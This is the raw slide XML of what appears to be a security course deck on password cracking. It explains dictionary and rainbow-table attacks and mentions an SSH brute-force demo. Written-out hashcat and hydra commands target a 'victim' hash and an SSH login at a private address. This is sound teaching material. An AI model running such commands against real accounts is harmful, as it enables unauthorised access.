            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> -m 100 -a 0 victim-hash.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>rockyou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.txt)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{3DDD23FC-0807-44B5-98DE-E8600276E4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4679027-0304-47F4-ACE8-5276A6521F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{2AFBE8E2-0181-4107-A9B4-2036F9F86E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65B8E2B-74A5-4122-9A7E-1E72DFFF6EF5}"/>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243734DD-A48F-472D-810D-90C7A3F846F0}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{66FEFE95-54AC-43B9-85B5-AA56A8E3D7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175C249-6087-4632-8D9C-8D25E9E58E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{1DBA7761-D3F9-42BF-8F85-E01C7613A5B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FBA5F44-3AC4-46A0-93BA-C83D5A1D5560}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{95F84C65-A6BB-4A04-8AA2-9FC076CFF8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834850-35A2-4282-B065-B0CC69750722}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{99A52E4C-0DCC-4B3F-826C-70F26CF711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BCF1B09-858A-4FF8-A77C-875EAAE0F170}"/>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B60C71D2-93D7-4A1E-865E-584FFE55A67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AB746C46-75E2-4BFE-9814-6CF0556BE2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B11EE8D-7B5F-4CAE-9212-C3F7EEEA0E02}"/>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Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{77E074CA-A913-4B86-BC7B-8EEAC9E1D2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CD38460-6624-484F-9497-B5CC691320CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Dictionary search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>a dictionary attack is an attack using a restricted subset of a keyspace to defeat a cipher or authentication mechanism by trying to determine its decryption key or passphrase, sometimes trying thousands or millions of likely possibilities often obtained from lists of past security breaches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>In this method, a list of commonly used passwords or words from a dictionary is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>usec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to attempt to gain access to an account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>These lists can be created manually or obtained from previous data breaches.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., hydra -l admin -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>rockyou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.txt ssh://192.168.1.100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{E7C7FAF8-1207-45A8-87F4-F6D4C0D34A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36E2211-EB3A-41B4-A926-662F004BE4BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{A9C730CC-A73F-4A28-93B9-00801E7772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EA609B4-DE26-4192-89B6-4E24FBB136A6}"/>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583AD14C-B777-4C0E-BB32-9F4F2F3CF084}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{9B426809-761D-4090-9625-70B2819A94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2CEBF1-6837-4874-9983-D25F0908254B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{2894BA65-0D49-4C68-927E-4C3594D2E1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485B79D-E9E8-4C3A-B834-3051A8F0CCDF}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{46F1EEF6-BC72-48C9-97C9-A4F9CC23AF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BB278B-6A2C-40AA-A580-1EBF7C3DA993}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{7B835F2A-EBD1-4494-9FF2-0412E10B6B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FFF77E-89D9-46D1-B640-527A0E970C1F}"/>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687409D5-5036-4341-97B4-02693FB5DC9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FA6ED52D-A476-80B2-B67F-B90AFC2A0244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Uncovering Attacks: SSH Brute-forcing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F21F103B-A5D1-3FE8-DB61-C1B389A40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33350"/>
            <a:ext cx="8648700" cy="39820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214675-B274-1F66-4A81-58596104D9AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4248150"/>
            <a:ext cx="42672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02/ demonstration of dictionary attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108329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2">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2">
            <a:extLst>
              <a:ext uri="{4911EDE9-5A79-4F4E-A29F-FEB7386878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DC5E6A9-BBB7-46E5-B8BE-7AD4721F84CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>table of contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{580F8094-BA37-4C0A-B7B4-81E5FC9EDD4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D9225B-24E6-4205-94A4-2254342B1629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>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56859C02-F820-45E4-AF78-094C7590C5EF}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{2E6F7263-A5A6-4F9C-8F7C-A26816B412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424904C-B5D2-4380-B078-DD89A3A3832E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2768431575"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="582535" y="1171556"/>
          <a:ext cx="7940182" cy="3277344"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{CE5C5E43-6BC0-4618-BB44-37CFE357241E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4095540">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3844642">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="373504">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Sr. No.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Topic</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361825">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1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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SNMP services enumeration and countermeasures</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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Routing devices enumeration and countermeasures</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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Password cracking</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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sniffing password hashes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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password protection</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>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Vulnerability exploitation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="373504">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7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                          <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Buffer overflow</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 4">
            <a:extLst>
              <a:ext uri="{9A4AC365-127E-47B8-9A29-BCB14DB7F8A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2406EA-9453-467D-B5C6-00B0016C5880}"/>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1E442BCF-8DD0-4B7F-A3C3-2B91AEE87E8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59ADBB39-7930-4F3F-B093-5898ABC5AD4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858A716-2877-4C7C-A0E5-71C82A3B23CB}"/>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Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{871078E4-2A73-4C81-B701-592A52201AF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109B02-98CF-4DF4-A8E2-2C289A3BA448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Rainbow-table attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>A rainbow table is a precomputed table for caching the outputs of a cryptographic hash function, usually for cracking password hashes. Passwords are typically stored not in plain text form, but as hash values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Rainbow tables are precomputed tables used for reversing cryptographic hash functions to obtain the plaintext password from its hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This technique can significantly speed up the process of password cracking, especially for weaker passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>However, it requires a considerable amount of storage space to store the tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., Using a pre-computed rainbow table (e.g., via tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>RainbowCrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>) to reverse a stolen hash rather than regenerating all possibilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{4F282C19-6FA6-44E7-B096-6D12B6DC73D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4C5674-F7E6-4F93-B307-939CAB0B0E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{4EA47FB9-4CB6-4ED0-B5F0-BE8942BDC0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950B795-DD77-4CE4-B67A-070D3FB56B2D}"/>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3F41160C-0090-4CCE-B4A4-A6B70383776C}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{3CC374BE-2CB1-4FAF-BC69-01BC05EAC21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A0717C-CAE2-4A1B-B319-162A5FFC6E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{9CE27F1D-94CA-4292-8855-DB75DF30624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DC9A801-9CAB-4D70-AF80-3A3CC19E2514}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{B07C5AC7-944E-410B-919F-706365445D8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B676CA-ACDA-4345-B895-824B6EC415A9}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{AEB51470-8EE0-4713-812D-33247D04B84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671DB6C-AE3C-4C9C-ADAB-867D4B07118D}"/>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AC24B367-E8DF-42F6-A987-7D1DCFB0256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A579094C-0E7D-CDFE-6A3C-43CC3DB79A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Screen Recording 2025-11-12 192611">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
